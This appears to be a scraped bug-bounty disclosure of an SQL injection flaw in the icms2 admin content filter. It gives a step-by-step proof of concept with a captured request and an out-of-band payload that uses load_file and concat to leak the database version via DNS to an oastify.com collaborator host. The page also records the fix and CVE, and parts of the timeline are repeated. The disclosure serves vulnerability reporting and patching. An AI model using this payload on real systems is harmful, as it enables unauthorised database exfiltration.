SQL Injection Vulnerability in Content Page in instantsoft/icms2

Valid

Reported on

Sep 12th 2023

In menu Content page, there is a SQL Injection Vulnerability at Filter function. To exploit this vulnerability, attacker injection query into filter field.

Proof of Concept

1. Login with admin

2. Go to "http://127.0.0.1/icms2/admin/content/5". In this case, the number 5 is content's id (Can be changed to any id you have).

3. Click `Filter` button then click `Apply` button.

4. Intercept this request

POST /icms2/admin/content/5/1 HTTP/1.1
Host: 127.0.0.1
Content-Length: 2478
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykAkt8RxbexNHSIRg
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/icms2/admin/content/5
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: icms[62formwidgettemplateoptions]=basic_options; icms[dashboard_chart]=%7B%22c%22%3A%22users%22%2C%22s%22%3A%22reg%22%2C%22i%22%3A%227%3ADAY%22%2C%22t%22%3A%22bar%22%7D; eeb4d5874c6380489fbb8d97b5eb70d5=26u44e1dbns40301ivn5tv8q66; icms[device_type]=desktop; icms[guest_date_log]=1694455424; ICMS64FF53AAE1F09=ltpmbrm096eo0q6p1pb1bn9q4v; icms[content_tree_path]=%2F5.1; icms[introjs_widgets]=1; icms[widgets_tree_path]=%2Fcontent%2Fcontent.163; icms[menu_tree_path]=%2F1.0
Connection: close

------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="filter"

page%253d1%2526advanced_filter%253dfilters%255b0%255d%255bfield%255d%253dtitle%2526filters%255b0%255d%255bcondition%255d%253dlk%2526filters%255b0%255d%255bvalue%255d%253daaa%2526filters%255b1%255d%255bfield%255d%253ddate_pub%2526filters%255b1%255d%255bcondition%255d%253deq%2526filters%255b1%255d%255bvalue%255d%253d%2526filters%255b2%255d%255bfield%255d%253duser_id%2526filters%255b2%255d%255bcondition%255d%253deq%2526filters%255b2%255d%255bvalue%255d%253d%2526filters%255b3%255d%255bfield%255d%253dkind%2526filters%255b3%255d%255bcondition%255d%253deq%2526filters%255b3%255d%255bvalue%255d%253d%2526filters%255b4%255d%255bfield%255d%253dsource%2526filters%255b4%255d%255bcondition%255d%253dlk%2526filters%255b4%255d%255bvalue%255d%253d%2526filters%255b5%255d%255bfield%255d%253dteaser%2526filters%255b5%255d%255bcondition%255d%253dlk%2526filters%255b5%255d%255bvalue%255d%253d%2526filters%255b6%255d%255bfield%255d%253dcontent%2526filters%255b6%255d%255bcondition%255d%253dlk%2526filters%255b6%255d%255bvalue%255d%253d%2526filters%255b7%255d%255bfield%255d%253dfeatured%2526filters%255b7%255d%255bcondition%255d%253deq%2526filters%255b7%255d%255bvalue%255d%253d%2526filters%255b8%255d%255bfield%255d%253dnotice%2526filters%255b8%255d%255bcondition%255d%253dlk%2526filters%255b8%255d%255bvalue%255d%253d%2526filters%255b9%255d%255bfield%255d%253drating%2526filters%255b9%255d%255bcondition%255d%253deq%2526filters%255b9%255d%255bvalue%255d%253d%2526filters%255b10%255d%255bfield%255d%253dcomments%2526filters%255b10%255d%255bcondition%255d%253deq%2526filters%255b10%255d%255bvalue%255d%253d%2526filters%255b11%255d%255bfield%255d%253dhits_count%2526filters%255b11%255d%255bcondition%255d%253deq%2526filters%255b11%255d%255bvalue%255d%253d%2526filters%255b12%255d%255bfield%255d%253dis_deleted%2526filters%255b12%255d%255bcondition%255d%253deq%2526filters%255b12%255d%255bvalue%255d%253d%2526perpage%253d30%2526order_by%253ddate_pub%2526order_to%253ddesc
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

date_pub
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

is_approved
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

is_pub
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

user_id
------WebKitFormBoundarykAkt8RxbexNHSIRg--

5. Edit the above request:

Replace string title to string load_file(concat('%255c%255c%255c%255c',version(),'.3fjigaetz7srti1dj7q6uw8jaag143ss.oastify.com%255c%255chen')) at parameter filters%255b0%255d%255bfield%255d%253d. Then send it with Repeater. For visualization, I will decode and explain this payload: filters[0][field]=(select load_file(concat('\\\\',version(),'.3fjigaetz7srti1dj7q6uw8jaag143ss.oastify.com\\hen'))) => append the version() query results to the DNS query via concat() query then send it via load_file() query

6. Get result:

At Burp Collaborator, I get the MySql version number in the DNS record: 10.4.28-MariaDB.3fjigaetz7srti1dj7q6uw8jaag143ss.oastify.com.

7. Video POC:

a. On the web interface

https://drive.google.com/file/d/1X_7ex2viGIB7AO7j_rCzp2zZdpm8KSvI/view?usp=drive_link

b. Intercerpt request and edit with payload

https://drive.google.com/file/d/1Svs6VHTJ89gaADCYtKFhnHkIHeSyD8DF/view?usp=drive_link

Impact

This vulnerability allows an attacker to recover data from the database like password, email and other potential sensitive data.

We are processing your report and will contact the instantsoft/icms2 team within 24 hours. 9 days ago

Trần Văn Đông modified the report

9 days ago

Trần Văn Đông modified the report

9 days ago

Trần Văn Đông modified the report

9 days ago

Trần Văn Đông modified the report

9 days ago

Trần Văn Đông modified the report

9 days ago

Fuze validated this vulnerability 9 days ago

Trần Văn Đông has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Fuze gave praise 9 days ago

Thanks!

The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1

Fuze marked this as fixed in 2.16.1 with commit 3a6b14 9 days ago

Fuze has been awarded the fix bounty

This vulnerability has been assigned a CVE

This vulnerability is scheduled to go public on Sep 13th 2023

Fuze published this vulnerability 9 days ago

ng`bthg

commented 8 days ago

quá đỉnh

to join this conversation

We are processing your report and will contact the instantsoft/icms2 team within 24 hours. 9 days ago

Trần Văn Đông modified the report

9 days ago

Trần Văn Đông modified the report

9 days ago

Trần Văn Đông modified the report

9 days ago

Trần Văn Đông modified the report

9 days ago

Trần Văn Đông modified the report

9 days ago

Fuze validated this vulnerability 9 days ago

Trần Văn Đông has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Fuze gave praise 9 days ago

Thanks!

The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1

Fuze marked this as fixed in 2.16.1 with commit 3a6b14 9 days ago

Fuze has been awarded the fix bounty

This vulnerability has been assigned a CVE

This vulnerability is scheduled to go public on Sep 13th 2023

Fuze published this vulnerability 9 days ago

ng`bthg

commented 8 days ago

quá đỉnh

to join this conversation

SQL Injection Vulnerability in Content Page in instantsoft/icms2

Proof of Concept

1. Login with admin

2. Go to "http://127.0.0.1/icms2/admin/content/5". In this case, the number 5 is content's id (Can be changed to any id you have).

3. Click Filter button then click Apply button.

4. Intercept this request

5. Edit the above request:

6. Get result:

7. Video POC:

a. On the web interface

b. Intercerpt request and edit with payload

Impact

3. Click `Filter` button then click `Apply` button.